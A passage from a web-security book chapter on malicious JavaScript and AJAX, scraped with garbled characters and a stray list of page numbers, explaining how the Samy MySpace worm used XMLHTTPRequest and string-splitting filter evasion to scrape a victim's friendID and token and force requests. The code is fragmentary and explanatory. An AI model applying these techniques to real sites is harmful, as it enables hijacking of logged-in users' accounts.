A secondary hurdle for Samy was to force the
browser to execute multiple GETs and POSTs, search source pages for specific values,
and perform other hostile actions on behalf of the currently logged-in user. The actions
Chapter 4: Malicious JavaScript and AJAX 109
were primarily performed with XMLHTTPRequest. The following shows how Samy
was able to execute such functions.
1. Samy needed to force a user??™s browsers to perform GETs to get the user??™s
current list of heroes. To perform this action, XMLHTTPRequest was used,
which was already made possible by item number 4 in the preceding input
?¬? ltering bypass section. The following code sample was used by Samy to force
GETs by the browser:
function
getData(AU){
M=getFromURL(AU,'friendID');
L=getFromURL(AU,'Mytoken')
}
2. To ?¬? nd the friendID of the user viewing the page, Samy need to search the
source page for the speci?¬? c friendID. Using the eval() function again, Samy
was able to ?¬? nd the value and store it for later use:
var index = html.indexOf('frien' + 'dID');
3. From GETs and searches, Samy was able to get a list of friends, but he now
needed to perform a POST to force the user to add Samy as a friend
(and a hero).
Pages:
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219